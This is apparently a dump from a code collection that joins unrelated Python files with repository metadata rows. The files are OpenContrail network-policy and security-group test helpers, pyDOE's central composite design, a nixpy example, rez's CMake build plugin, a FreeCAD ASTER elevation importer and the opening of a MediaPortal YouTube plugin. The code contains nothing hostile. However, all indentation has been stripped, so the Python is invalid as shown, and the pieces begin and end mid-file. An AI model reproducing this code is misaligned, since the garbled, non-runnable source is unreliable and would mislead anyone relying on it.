port.add_port_tuple(pt)
self._vnc_lib.virtual_machine_interface_create(port)
# Let a chance to the API to create iip for the vmi of the pt
# before creating the si and the schema allocates an iip
# address to the service chain
gevent.sleep(0.1)
return service_instance.get_fq_name_str()
def create_network_policy(self, vn1, vn2, service_list=None, mirror_service=None,
auto_policy=False, create_right_port = True, **kwargs):
vn1_name = vn1 if isinstance(vn1, basestring) else vn1.get_fq_name_str()
vn2_name = vn2 if isinstance(vn2, basestring) else vn2.get_fq_name_str()
addr1 = AddressType(virtual_network=vn1_name, subnet=kwargs.get('subnet_1'))
addr2 = AddressType(virtual_network=vn2_name, subnet=kwargs.get('subnet_2'))
port = PortType(-1, 0)
service_name_list = []
si_list = service_list or []
if service_list:
for service in si_list:
service_name_list.append(self._create_service(
[('left', vn1_name), ('right', vn2_name)], service,
auto_policy, create_right_port, **kwargs))
if mirror_service:
mirror_si = self._create_service(
[('left', vn1_name), ('right', vn2_name)], mirror_service, False,
service_mode='transparent', service_type='analyzer')
action_list = ActionListType()
if mirror_service:
mirror = MirrorActionType(analyzer_name=mirror_si)
action_list.mirror_to=mirror
if service_name_list:
action_list.apply_service=service_name_list
else:
action_list.simple_action='pass'
prule = PolicyRuleType(direction="<>", protocol="any",
src_addresses=[addr1], dst_addresses=[addr2],
src_ports=[port], dst_ports=[port],
action_list=action_list)
pentry = PolicyEntriesType([prule])
np = NetworkPolicy(str(uuid.uuid4()), network_policy_entries=pentry)
if auto_policy:
return np
self._vnc_lib.network_policy_create(np)
return np
# end create_network_policy
def create_logical_router(self, name, nb_of_attached_networks=1, **kwargs):
lr = LogicalRouter(name, **kwargs)
vns = []
vmis = []
iips = []
for idx in range(nb_of_attached_networks):
# Virtual Network
vn = self.create_virtual_network('%s-network%d' % (name, idx),
'10.%d.0.0/24' % idx)
vns.append(vn)
# Virtual Machine Interface
vmi_name = '%s-network%d-vmi' % (name, idx)
vmi = VirtualMachineInterface(
vmi_name, parent_type='project',
fq_name=['default-domain', 'default-project', vmi_name])
vmi.set_virtual_machine_interface_device_owner(
'network:router_interface')
vmi.add_virtual_network(vn)
self._vnc_lib.virtual_machine_interface_create(vmi)
lr.add_virtual_machine_interface(vmi)
vmis.append(vmi)
# Instance IP
gw_ip = vn.get_network_ipam_refs()[0]['attr'].ipam_subnets[0].\
default_gateway
subnet_uuid = vn.get_network_ipam_refs()[0]['attr'].\
ipam_subnets[0].subnet_uuid
iip = InstanceIp(name='%s-network%d-iip' % (name, idx))
iip.set_subnet_uuid(subnet_uuid)
iip.set_virtual_machine_interface(vmi)
iip.set_virtual_network(vn)
iip.set_instance_ip_family('v4')
iip.set_instance_ip_address(gw_ip)
self._vnc_lib.instance_ip_create(iip)
iips.append(iip)
self._vnc_lib.logical_router_create(lr)
return lr, vns, vmis, iips
def _security_group_rule_build(self, rule_info, sg_fq_name_str):
protocol = rule_info['protocol']
port_min = rule_info['port_min'] or 0
port_max = rule_info['port_max'] or 65535
direction = rule_info['direction'] or 'ingress'
ip_prefix = rule_info['ip_prefix']
ether_type = rule_info['ether_type']
if ip_prefix:
cidr = ip_prefix.split('/')
pfx = cidr[0]
pfx_len = int(cidr[1])
endpt = [AddressType(subnet=SubnetType(pfx, pfx_len))]
else:
endpt = [AddressType(security_group=sg_fq_name_str)]
local = None
remote = None
if direction == 'ingress':
dir = '>'
local = endpt
remote = [AddressType(security_group='local')]
else:
dir = '>'
remote = endpt
local = [AddressType(security_group='local')]
if not protocol:
protocol = 'any'
if protocol.isdigit():
protocol = int(protocol)
if protocol < 0 or protocol > 255:
raise Exception('SecurityGroupRuleInvalidProtocol-%s' % protocol)
else:
if protocol not in ['any', 'tcp', 'udp', 'icmp', 'icmp6']:
raise Exception('SecurityGroupRuleInvalidProtocol-%s' % protocol)
if not ip_prefix and not sg_fq_name_str:
if not ether_type:
ether_type = 'IPv4'
sgr_uuid = str(uuid.uuid4())
rule = PolicyRuleType(rule_uuid=sgr_uuid, direction=dir,
protocol=protocol,
src_addresses=local,
src_ports=[PortType(0, 65535)],
dst_addresses=remote,
dst_ports=[PortType(port_min, port_max)],
ethertype=ether_type)
return rule
#end _security_group_rule_build
def _security_group_rule_append(self, sg_obj, sg_rule):
rules = sg_obj.get_security_group_entries()
if rules is None:
rules = PolicyEntriesType([sg_rule])
else:
for sgr in rules.get_policy_rule() or []:
sgr_copy = copy.copy(sgr)
sgr_copy.rule_uuid = sg_rule.rule_uuid
if sg_rule == sgr_copy:
raise Exception('SecurityGroupRuleExists %s' % sgr.rule_uuid)
rules.add_policy_rule(sg_rule)
sg_obj.set_security_group_entries(rules)
#end _security_group_rule_append
def _security_group_rule_remove(self, sg_obj, sg_rule):
rules = sg_obj.get_security_group_entries()
if rules is None:
raise Exception('SecurityGroupRuleNotExists %s' % sgr.rule_uuid)
else:
for sgr in rules.get_policy_rule() or []:
if sgr.rule_uuid == sg_rule.rule_uuid:
rules.delete_policy_rule(sgr)
sg_obj.set_security_group_entries(rules)
return
raise Exception('SecurityGroupRuleNotExists %s' % sg_rule.rule_uuid)
#end _security_group_rule_append
# end TestCase
class ErrorInterceptingLogger(sandesh_logger.SandeshLogger):
_exceptions = []
_other_errors = []
@classmethod
def register_exception(cls, msg, *args, **kwargs):
if 'traceback' in msg.lower():
cls._exceptions.append((msg, args, kwargs))
return True
return False
@classmethod
def register_error(cls, msg, *args, **kwargs):
if not cls.register_exception(msg, *args, **kwargs):
cls._other_errors.append((msg, args, kwargs))
@classmethod
def get_exceptions(cls):
return list(cls._exceptions)
@classmethod
def get_other_errors(cls):
return list(cls._other_errors)
@classmethod
def reset(cls):
cls._exceptions, cls._other_errors = [], []
@classmethod
def get_qualified_name(cls):
return '{module_name}.{class_name}'.format(
module_name=cls.__module__, class_name=cls.__name__)
class LoggerWrapper(object):
def __init__(self, logger):
self._logger = logger
def __getattr__(self, item):
return getattr(self._logger, item)
def error(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.critical(msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.exception(msg, *args, **kwargs)
def log(self, lvl, msg, *args, **kwargs):
ErrorInterceptingLogger.register_exception(
msg, *args, **kwargs)
return self._logger.log(lvl, msg, *args, **kwargs)
def __init__(self, *args, **kwargs):
super(ErrorInterceptingLogger, self).__init__(*args, **kwargs)
self._logger = ErrorInterceptingLogger.LoggerWrapper(
self._logger)
| apache-2.0 | -2,208,394,981,384,609,800 | 37.410698 | 121 | 0.594897 | false |
lepy/phuzzy | phuzzy/contrib/pydoe/doe_composite.py | 1 | 6172 | """
This code was originally published by the following individuals for use with
Scilab:
Copyright (C) 2012 - 2013 - Michael Baudin
Copyright (C) 2012 - Maria Christopoulou
Copyright (C) 2010 - 2011 - INRIA - Michael Baudin
Copyright (C) 2009 - Yann Collette
Copyright (C) 2009 - CEA - Jean-Marc Martinez
website: forge.scilab.org/index.php/p/scidoe/sourcetree/master/macros
Much thanks goes to these individuals. It has been converted to Python by
Abraham Lee.
"""
# import numpy as np
from phuzzy.contrib.pydoe.doe_factorial import ff2n
from phuzzy.contrib.pydoe.doe_star import star
from phuzzy.contrib.pydoe.doe_union import union
from phuzzy.contrib.pydoe.doe_repeat_center import repeat_center
__all__ = ['ccdesign']
def ccdesign(n, center=(4, 4), alpha='orthogonal', face='circumscribed'):
"""
Central composite design
Parameters
----------
n : int
The number of factors in the design.
Optional
--------
center : int array
A 1-by-2 array of integers, the number of center points in each block
of the design. (Default: (4, 4)).
alpha : str
A string describing the effect of alpha has on the variance. ``alpha``
can take on the following values:
1. 'orthogonal' or 'o' (Default)
2. 'rotatable' or 'r'
face : str
The relation between the start points and the corner (factorial) points.
There are three options for this input:
1. 'circumscribed' or 'ccc': This is the original form of the central
composite design. The star points are at some distance ``alpha``
from the center, based on the properties desired for the design.
The start points establish new extremes for the low and high
settings for all factors. These designs have circular, spherical,
or hyperspherical symmetry and require 5 levels for each factor.
Augmenting an existing factorial or resolution V fractional
factorial design with star points can produce this design.
2. 'inscribed' or 'cci': For those situations in which the limits
specified for factor settings are truly limits, the CCI design
uses the factors settings as the star points and creates a factorial
or fractional factorial design within those limits (in other words,
a CCI design is a scaled down CCC design with each factor level of
the CCC design divided by ``alpha`` to generate the CCI design).
This design also requires 5 levels of each factor.
3. 'faced' or 'ccf': In this design, the star points are at the center
of each face of the factorial space, so ``alpha`` = 1. This
variety requires 3 levels of each factor. Augmenting an existing
factorial or resolution V design with appropriate star points can
also produce this design.
Notes
-----
- Fractional factorial designs are not (yet) available here.
- 'ccc' and 'cci' can be rotatable design, but 'ccf' cannot.
- If ``face`` is specified, while ``alpha`` is not, then the default value
of ``alpha`` is 'orthogonal'.
Returns
-------
mat : 2d-array
The design matrix with coded levels -1 and 1
Example
-------
::
>>> ccdesign(3)
array([[-1. , -1. , -1. ],
[ 1. , -1. , -1. ],
[-1. , 1. , -1. ],
[ 1. , 1. , -1. ],
[-1. , -1. , 1. ],
[ 1. , -1. , 1. ],
[-1. , 1. , 1. ],
[ 1. , 1. , 1. ],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ],
[-1.82574186, 0. , 0. ],
[ 1.82574186, 0. , 0. ],
[ 0. , -1.82574186, 0. ],
[ 0. , 1.82574186, 0. ],
[ 0. , 0. , -1.82574186],
[ 0. , 0. , 1.82574186],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ]])
"""
# Check inputs
if not isinstance(n, int) and n > 1:
raise Exception('"n" must be an integer greater than 1.')
if not alpha.lower() in ('orthogonal', 'o', 'rotatable',
'r'):
raise Exception('Invalid value for "alpha": {:}'.format(alpha))
if not face.lower() in ('circumscribed', 'ccc', 'inscribed', 'cci',
'faced', 'ccf'):
raise Exception('Invalid value for "face": {:}'.format(face))
try:
nc = len(center)
except:
raise TypeError('Invalid value for "center": {:}. Expected a 1-by-2 array.'.format(center))
else:
if nc != 2:
raise ValueError('Invalid number of values for "center" (expected 2, but got {:})'.format(nc))
# Orthogonal Design
if alpha.lower() in ('orthogonal', 'o'):
H2, a = star(n, alpha='orthogonal', center=center)
# Rotatable Design
if alpha.lower() in ('rotatable', 'r'):
H2, a = star(n, alpha='rotatable')
# Inscribed CCD
if face.lower() in ('inscribed', 'cci'):
H1 = ff2n(n)
H1 = H1 / a # Scale down the factorial points
H2, a = star(n)
# Faced CCD
if face.lower() in ('faced', 'ccf'):
H2, a = star(n) # Value of alpha is always 1 in Faced CCD
H1 = ff2n(n)
# Circumscribed CCD
if face.lower() in ('circumscribed', 'ccc'):
H1 = ff2n(n)
C1 = repeat_center(n, center[0])
C2 = repeat_center(n, center[1])
H1 = union(H1, C1)
H2 = union(H2, C2)
H = union(H1, H2)
return H
| mit | 4,254,063,885,363,651,600 | 36.634146 | 106 | 0.516202 | false |
stoewer/nixpy | docs/source/examples/irregularlySampledData.py | 1 | 2147 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright © 2014 German Neuroinformatics Node (G-Node)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted under the terms of the BSD License. See
LICENSE file in the root of the Project.
Author: Jan Grewe <jan.grewe@g-node.org>
This tutorial shows how irregularly sampled data is stored in nix-files.
See https://github.com/G-node/nix/wiki for more information.
"""
import nixio as nix
import numpy as np
import matplotlib.pylab as plt
def create_data(duration, interval):
times = np.around(np.cumsum(np.random.poisson(interval*1000, 1.5*duration/interval))/1000., 3)
times = times[times <= duration]
x = np.arange(0, times[-1] * 2 * np.pi, 0.001)
y = np.sin(5 * x)
return times, y[np.asarray(times / 0.001 * 2 * np.pi, dtype=int)]
def plot_data(data_array):
x_axis = data_array.dimensions[0]
x = list(x_axis.ticks)
y = data_array.data
plt.plot(x, y, marker='o', color='dodgerblue')
plt.xlabel(x_axis.label + " [" + x_axis.unit + "]")
plt.ylabel(data_array.label + " [" + data_array.unit + "]")
plt.title(data_array.name)
plt.xlim([0, times[-1]])
plt.ylim(np.min(y)*1.1, np.max(y)*1.1)
plt.show()
if __name__ == "__main__":
# fake some data
times, y = create_data(1.0, 0.02)
# create a new file overwriting any existing content
file_name = 'irregular_data_example.h5'
file = nix.File.open(file_name, nix.FileMode.Overwrite)
# create a 'Block' that represents a grouping object. Here, the recording session.
# it gets a name and a type
block = file.create_block("block name", "nix.session")
# create a 'DataArray' to take the data, add some information about the signal
data = block.create_data_array("sinewave", "nix.irregular_sampled", data=y)
data.unit = "mV"
data.label = "voltage"
# add a descriptor for the xaxis
dim = data.append_range_dimension(times)
dim.unit = "s"
dim.label = "time"
# let's plot the data from the stored information
plot_data(data)
file.close()
| bsd-3-clause | 2,646,880,914,750,909,000 | 31.029851 | 98 | 0.659832 | false |
mikrosimage/rez | src/rezplugins/build_system/cmake.py | 1 | 11253 | """
CMake-based build system
"""
from rez.build_system import BuildSystem
from rez.build_process_ import BuildType
from rez.resolved_context import ResolvedContext
from rez.exceptions import BuildSystemError
from rez.util import create_forwarding_script
from rez.packages_ import get_developer_package
from rez.utils.platform_ import platform_
from rez.config import config
from rez.backport.shutilwhich import which
from rez.vendor.schema.schema import Or
from rez.shells import create_shell
import functools
import os.path
import sys
import os
class RezCMakeError(BuildSystemError):
pass
class CMakeBuildSystem(BuildSystem):
"""The CMake build system.
The 'cmake' executable is run within the build environment. Rez supplies a
library of cmake macros in the 'cmake_files' directory; these are added to
cmake's searchpath and are available to use in your own CMakeLists.txt
file.
The following CMake variables are available:
- REZ_BUILD_TYPE: One of 'local', 'central'. Describes whether an install
is going to the local packages path, or the release packages path.
- REZ_BUILD_INSTALL: One of 0 or 1. If 1, an installation is taking place;
if 0, just a build is occurring.
"""
build_systems = {'eclipse': "Eclipse CDT4 - Unix Makefiles",
'codeblocks': "CodeBlocks - Unix Makefiles",
'make': "Unix Makefiles",
'nmake': "NMake Makefiles",
'xcode': "Xcode"}
build_targets = ["Debug", "Release", "RelWithDebInfo"]
schema_dict = {
"build_target": Or(*build_targets),
"build_system": Or(*build_systems.keys()),
"cmake_args": [basestring],
"cmake_binary": Or(None, basestring),
"make_binary": Or(None, basestring)}
@classmethod
def name(cls):
return "cmake"
@classmethod
def child_build_system(cls):
return "make"
@classmethod
def is_valid_root(cls, path):
return os.path.isfile(os.path.join(path, "CMakeLists.txt"))
@classmethod
def bind_cli(cls, parser):
settings = config.plugins.build_system.cmake
parser.add_argument("--bt", "--build-target", dest="build_target",
type=str, choices=cls.build_targets,
default=settings.build_target,
help="set the build target (default: %(default)s).")
parser.add_argument("--bs", "--build-system", dest="build_system",
type=str, choices=cls.build_systems.keys(),
default=settings.build_system,
help="set the cmake build system (default: %(default)s).")
def __init__(self, working_dir, opts=None, write_build_scripts=False,
verbose=False, build_args=[], child_build_args=[]):
super(CMakeBuildSystem, self).__init__(
working_dir,
opts=opts,
write_build_scripts=write_build_scripts,
verbose=verbose,
build_args=build_args,
child_build_args=child_build_args)
self.settings = self.package.config.plugins.build_system.cmake
self.build_target = (opts and opts.build_target) or \
self.settings.build_target
self.cmake_build_system = (opts and opts.build_system) or \
self.settings.build_system
if self.cmake_build_system == 'xcode' and platform_.name != 'osx':
raise RezCMakeError("Generation of Xcode project only available "
"on the OSX platform")
def build(self, context, variant, build_path, install_path, install=False,
build_type=BuildType.local):
def _pr(s):
if self.verbose:
print s
# find cmake binary
if self.settings.cmake_binary:
exe = self.settings.cmake_binary
else:
exe = context.which("cmake", fallback=True)
if not exe:
raise RezCMakeError("could not find cmake binary")
found_exe = which(exe)
if not found_exe:
raise RezCMakeError("cmake binary does not exist: %s" % exe)
sh = create_shell()
# assemble cmake command
cmd = [found_exe, "-d", self.working_dir]
cmd += (self.settings.cmake_args or [])
cmd += (self.build_args or [])
cmd.append("-DCMAKE_INSTALL_PREFIX=%s" % install_path)
cmd.append("-DCMAKE_MODULE_PATH=%s" %
sh.get_key_token("CMAKE_MODULE_PATH").replace('\\', '/'))
cmd.append("-DCMAKE_BUILD_TYPE=%s" % self.build_target)
cmd.append("-DREZ_BUILD_TYPE=%s" % build_type.name)
cmd.append("-DREZ_BUILD_INSTALL=%d" % (1 if install else 0))
cmd.extend(["-G", self.build_systems[self.cmake_build_system]])
if config.rez_1_cmake_variables and \
not config.disable_rez_1_compatibility and \
build_type == BuildType.central:
cmd.append("-DCENTRAL=1")
# execute cmake within the build env
_pr("Executing: %s" % ' '.join(cmd))
if not os.path.abspath(build_path):
build_path = os.path.join(self.working_dir, build_path)
build_path = os.path.realpath(build_path)
callback = functools.partial(self._add_build_actions,
context=context,
package=self.package,
variant=variant,
build_type=build_type)
# run the build command and capture/print stderr at the same time
retcode, _, _ = context.execute_shell(command=cmd,
block=True,
cwd=build_path,
actions_callback=callback)
ret = {}
if retcode:
ret["success"] = False
return ret
if self.write_build_scripts:
# write out the script that places the user in a build env, where
# they can run make directly themselves.
build_env_script = os.path.join(build_path, "build-env")
create_forwarding_script(build_env_script,
module=("build_system", "cmake"),
func_name="_FWD__spawn_build_shell",
working_dir=self.working_dir,
build_dir=build_path,
variant_index=variant.index)
ret["success"] = True
ret["build_env_script"] = build_env_script
return ret
# assemble make command
if self.settings.make_binary:
cmd = [self.settings.make_binary]
else:
cmd = ["make"]
cmd += (self.child_build_args or [])
# nmake has no -j
if self.settings.make_binary != 'nmake':
if not any(x.startswith("-j") for x in (self.child_build_args or [])):
n = variant.config.build_thread_count
cmd.append("-j%d" % n)
# execute make within the build env
_pr("\nExecuting: %s" % ' '.join(cmd))
retcode, _, _ = context.execute_shell(command=cmd,
block=True,
cwd=build_path,
actions_callback=callback)
if not retcode and install and "install" not in cmd:
cmd.append("install")
# execute make install within the build env
_pr("\nExecuting: %s" % ' '.join(cmd))
retcode, _, _ = context.execute_shell(command=cmd,
block=True,
cwd=build_path,
actions_callback=callback)
ret["success"] = (not retcode)
return ret
@staticmethod
def _add_build_actions(executor, context, package, variant, build_type):
settings = package.config.plugins.build_system.cmake
cmake_path = os.path.join(os.path.dirname(__file__), "cmake_files")
template_path = os.path.join(os.path.dirname(__file__), "template_files")
executor.env.CMAKE_MODULE_PATH.append(cmake_path.replace('\\', '/'))
executor.env.REZ_BUILD_DOXYFILE = os.path.join(template_path, 'Doxyfile')
executor.env.REZ_BUILD_VARIANT_INDEX = variant.index or 0
executor.env.REZ_BUILD_THREAD_COUNT = package.config.build_thread_count
# build always occurs on a filesystem package, thus 'filepath' attribute
# exists. This is not the case for packages in general.
executor.env.REZ_BUILD_PROJECT_FILE = package.filepath
executor.env.REZ_BUILD_PROJECT_VERSION = str(package.version)
executor.env.REZ_BUILD_PROJECT_NAME = package.name
executor.env.REZ_BUILD_PROJECT_DESCRIPTION = \
(package.description or '').strip()
executor.env.REZ_BUILD_REQUIRES_UNVERSIONED = \
' '.join(x.name for x in context.requested_packages(True))
executor.env.REZ_BUILD_INSTALL_PYC = '1' if settings.install_pyc else '0'
if config.rez_1_environment_variables and \
not config.disable_rez_1_compatibility and \
build_type == BuildType.central:
executor.env.REZ_IN_REZ_RELEASE = 1
def _FWD__spawn_build_shell(working_dir, build_dir, variant_index):
# This spawns a shell that the user can run 'make' in directly
context = ResolvedContext.load(os.path.join(build_dir, "build.rxt"))
package = get_developer_package(working_dir)
variant = package.get_variant(variant_index)
config.override("prompt", "BUILD>")
callback = functools.partial(CMakeBuildSystem._add_build_actions,
context=context,
package=package,
variant=variant,
build_type=BuildType.local)
retcode, _, _ = context.execute_shell(block=True,
cwd=build_dir,
actions_callback=callback)
sys.exit(retcode)
def register_plugin():
return CMakeBuildSystem
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
| lgpl-3.0 | 6,769,576,808,462,202,000 | 41.146067 | 86 | 0.570603 | false |
microelly2/geodata | geodat/import_aster.py | 1 | 5208 | ''' geodat import AST (gdal)'''
# -*- coding: utf-8 -*-
#-------------------------------------------------
#-- geodat import AST (gdal)
#--
#-- microelly 2016 v 0.1
#--
#-- GNU Lesser General Public License (LGPL)
#-------------------------------------------------
#http://geoinformaticstutorial.blogspot.de/2012/09/reading-raster-data-with-python-and-gdal.html
#http://forum.freecadweb.org/viewtopic.php?f=8&t=17647&start=10#p139201
# the ast file is expected in ~/.FreeCAD/geodat/AST
# FreeCAD.ConfigGet("UserAppData") +'/geodat/AST/ASTGTM2_' + ff +'_dem.tif'
'''
ASTER GDEM Policy Agreements
I agree to redistribute the ASTER GDEM *only* to individuals within my organization or project of intended use or in response to disasters in support of the GEO Disaster Theme.
When presenting or publishing ASTER GDEM data, I agree to include "ASTER GDEM is a product of METI and NASA."
Because there are known inaccuracies and artifacts in the data set, please use the product with awareness of its limitations. The data are provided "as is" and neither NASA nor METI/ERSDAC will be responsible for any damages resulting from use of the data.
'''
from geodat.say import *
import geodat.transversmercator
from geodat.transversmercator import TransverseMercator
import geodat.import_xyz
import geodat.geodat_lib
# apt-get install python-gdal
import gdal
from gdalconst import *
import WebGui
import Points
def import_ast(b=50.26,l=11.39):
'''get the data from a downloaded file
the file is expected in FreeCAD.ConfigGet("UserAppData") + '/geodat/AST/'
with the common filename for lan/lot parameters
example .../.FreeCAD/geodat/AST/ASTGTM2_N51E010_dem.tif
'''
bs=np.floor(b)
ls=np.floor(l)
# the ast dataset
ff="N%02dE%03d" % (int(bs),int(ls))
fn=FreeCAD.ConfigGet("UserAppData") +'/geodat/AST/ASTGTM2_' + ff +'_dem.tif'
print(fn)
'''
fn='/home/microelly2/FCB/b217_heightmaps/tandemx_daten/Chile-Chuquicatmata.tif'
b=-22.3054705
l=-68.9259643
bs=np.floor(b)
ls=np.floor(l)
print(fn)
'''
dataset = gdal.Open(fn, GA_ReadOnly)
if dataset == None:
msg="\nProblem cannot open " + fn + "\n"
FreeCAD.Console.PrintError(msg)
errorDialog(msg)
return
cols=dataset.RasterXSize
rows=dataset.RasterYSize
geotransform = dataset.GetGeoTransform()
originX = geotransform[0]
originY = geotransform[3]
pixelWidth = geotransform[1]
pixelHeight = geotransform[5]
band = dataset.GetRasterBand(1)
data = band.ReadAsArray(0, 0, cols, rows)
#data.shape -> 3601 x 3601 secs
# erfurt 51,11
#data[0,0]
# zeitz 51,12
#data[3600,0]
# windischletten(zapfendorf) 50,11
#data[0,3600]
# troestau fichtelgebirge 50,12
#data[3600,3600]
px=int(round((bs+1-b)*3600))
py=int(round((l-ls)*3600))
pts=[]
d=70
d1=20
d2=50
d1=d
d2=d
tm=TransverseMercator()
tm.lat=b
tm.lon=l
center=tm.fromGeographic(tm.lat,tm.lon)
z0= data[px,py] # relative height to origin px,py
for x in range(px-d1,px+d1):
for y in range(py-d2,py+d2):
ll=tm.fromGeographic(bs+1-1.0/3600*x,ls+1.0/3600*y)
pt=FreeCAD.Vector(ll[0]-center[0],ll[1]-center[1], 1000.0* (data[x,y]-z0))
pts.append(pt)
# display the point cloud
p=Points.Points(pts)
Points.show(p)
return pts
s6='''
MainWindow:
VerticalLayout:
id:'main'
# setFixedHeight: 600
setFixedWidth: 600
move: PySide.QtCore.QPoint(3000,100)
QtGui.QLabel:
setText:"C O N F I G U R A T I O N"
QtGui.QLabel:
QtGui.QLineEdit:
id: 'bl'
# zeyerner wand **
#(50.2570152,11.3818337)
# outdoor inn *
#(50.3737109,11.1891891)
# roethen **
#(50.3902794,11.157629)
# kreuzung huettengrund nach judenbach ***
#(50.368209,11.2016135)
setText:"50.368209,11.2016135"
# coburg zentrum
setText:"50.2639926,10.9686946"
QtGui.QPushButton:
setText: "Create height models"
clicked.connect: app.runbl
QtGui.QPushButton:
setText: "show Map"
clicked.connect: app.showMap
'''
## the gui backend
class MyApp(object):
## create the height model
def runbl(self):
bl=self.root.ids['bl'].text()
spli=bl.split(',')
b=float(spli[0])
l=float(spli[1])
s=15
import_heights(float(b),float(l),float(s))
## display the location in openstreeetmap
def showMap(self):
bl=self.root.ids['bl'].text()
spli=bl.split(',')
b=float(spli[0])
l=float(spli[1])
s=15
WebGui.openBrowser( "http://www.openstreetmap.org/#map=16/"+str(b)+'/'+str(l))
## the dialog to import a gdal file
def mydialog():
'''the dialog to import a gdal file'''
app=MyApp()
import geodat
import geodat.miki as gmiki
miki=gmiki.Miki()
miki.app=app
app.root=miki
miki.run(s6)
FreeCAD.mm=miki
return miki
## import heigjs using import_xyz
def import_heights(b,l,s):
ts=time.time()
pcl=import_ast(b,l)
pts=pcl
ff="N" + str(b) + " E" + str(l)
nurbs=geodat.import_xyz.suv2(ff,pts,u=0,v=0,d=140,la=140,lb=140)
te=time.time()
print ("time to create models:",te-ts)
fn=geodat.geodat_lib.genSizeImage(size=512)
# geodat.geodat_lib.addImageTexture(nurbs,fn,scale=(8,3))
nurbs.ViewObject.Selectable = False
## test start and hide the dialog
def runtest():
m=mydialog()
m.objects[0].hide()
if __name__ == '__main__':
runtest()
def importASTER():
mydialog()
| lgpl-3.0 | -4,922,200,730,300,529,000 | 20.520661 | 256 | 0.679724 | false |
schleichdi2/OpenNfr_E2_Gui-6.0 | lib/python/Plugins/Extensions/MediaPortal/additions/mediatheken/youtube.py | 1 | 66866 | # -*- coding: utf-8 -*-
import json
from Plugins.Extensions.MediaPortal.plugin import _
from Plugins.Extensions.MediaPortal.resources.imports import *
from Plugins.Extensions.MediaPortal.resources.choiceboxext import ChoiceBoxExt
from Plugins.Extensions.MediaPortal.resources.keyboardext import VirtualKeyBoardExt
from Plugins.Extensions.MediaPortal.resources.youtubeplayer import YoutubePlayer
from Plugins.Extensions.MediaPortal.resources.menuhelper import MenuHelper
from Plugins.Extensions.MediaPortal.resources.twagenthelper import twAgentGetPage
config.mediaportal.yt_param_regionid_idx = ConfigInteger(default = 2)
config.mediaportal.yt_param_time_idx = ConfigInteger(default = 0)
config.mediaportal.yt_param_meta_idx = ConfigInteger(default = 1)
config.mediaportal.yt_paramListIdx = ConfigInteger(default = 0)
config.mediaportal.yt_param_3d_idx = ConfigInteger(default = 0)
config.mediaportal.yt_param_duration_idx = ConfigInteger(default = 0)
config.mediaportal.yt_param_video_definition_idx = ConfigInteger(default = 0)
config.mediaportal.yt_param_event_types_idx = ConfigInteger(default = 0)
config.mediaportal.yt_param_video_type_idx = ConfigInteger(default = 0)
config.mediaportal.yt_refresh_token = ConfigText(default="")
APIKEYV3 = mp_globals.yt_a
param_hl = ('&hl=en-GB', '&hl=de-DE', '&hl=fr-FR', '&hl=it-IT', '')
param_ajax_hl = ('en', 'de', 'fr', 'it', '')
picker_lang = ''
param_ajax_gl = ('us','gb','de','fr','it')
agent = getUserAgent()
std_headers = {
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
}
default_cover = "file://%s/youtube.png" % (config.mediaportal.iconcachepath.value + "logos")
class youtubeGenreScreen(MenuHelper):
def __init__(self, session):
global yt_oauth2
self.param_qr = ""
self.param_author = ""
self.old_mainidx = -1
self.param_safesearch = ['&safeSearch=none']
self.param_format = '&format=5'
self.subCat = []
self.subCat_L2 = []
self.param_time = [
(_("Date"), "&order=date"),
(_("Rating"), "&order=rating"),
(_("Relevance"), "&order=relevance"),
(_("Title"), "&order=title"),
(_("Video count"), "&order=videoCount"),
(_("View count"), "&order=viewCount")
]
self.param_metalang = [
(_('English'), '&relevanceLanguage=en'),
(_('German'), '&relevanceLanguage=de'),
(_('French'), '&relevanceLanguage=fr'),
(_('Italian'), '&relevanceLanguage=it'),
(_('Any'), '')
]
self.param_regionid = [
(_('Whole world'), '®ionCode=US'),
(_('England'), '®ionCode=GB'),
(_('Germany'), '®ionCode=DE'),
(_('France'), '®ionCode=FR'),
(_('Italy'), '®ionCode=IT')
]
self.param_duration = [
(_('Any'), ''),
('< 4 Min', '&videoDuration=short'),
('4..20 Min', '&videoDuration=medium'),
('> 20 Min', '&videoDuration=long')
]
self.param_3d = [
(_('Any'), ''),
(_('2D'), '&videoDimension=2d'),
(_('3D'), '&videoDimension=3d')
]
self.param_video_definition = [
(_('Any'), ''),
(_('High'), '&videoDefinition=high'),
(_('Low'), '&videoDefinition=standard')
]
self.param_event_types = [
(_('None'), ''),
(_('Completed'), '&eventType=completed'),
(_('Live'), '&eventType=live'),
(_('Upcoming'), '&eventType=upcoming')
]
self.param_video_type = [
(_('Any'), ''),
(_('Episode'), '&videoType=episode'),
(_('Movie'), '&videoType=movie')
]
self.paramList = [
(_('Search request'), (self.paraQuery, None), (0,1,2,)),
(_('Event type'), (self.param_event_types, config.mediaportal.yt_param_event_types_idx), (0,)),
(_('Sort by'), (self.param_time, config.mediaportal.yt_param_time_idx), (0,1,2,)),
(_('Language'), (self.param_metalang, config.mediaportal.yt_param_meta_idx), (0,1,2,3,7,9,10,11,12,13,14)),
(_('Search region'), (self.param_regionid, config.mediaportal.yt_param_regionid_idx), (0,1,2,3,7,9,10,11,12,13,14)),
(_('User name'), (self.paraAuthor, None), (0,1,2,)),
(_('3D Search'), (self.param_3d, config.mediaportal.yt_param_3d_idx), (0,)),
(_('Runtime'), (self.param_duration, config.mediaportal.yt_param_duration_idx), (0,)),
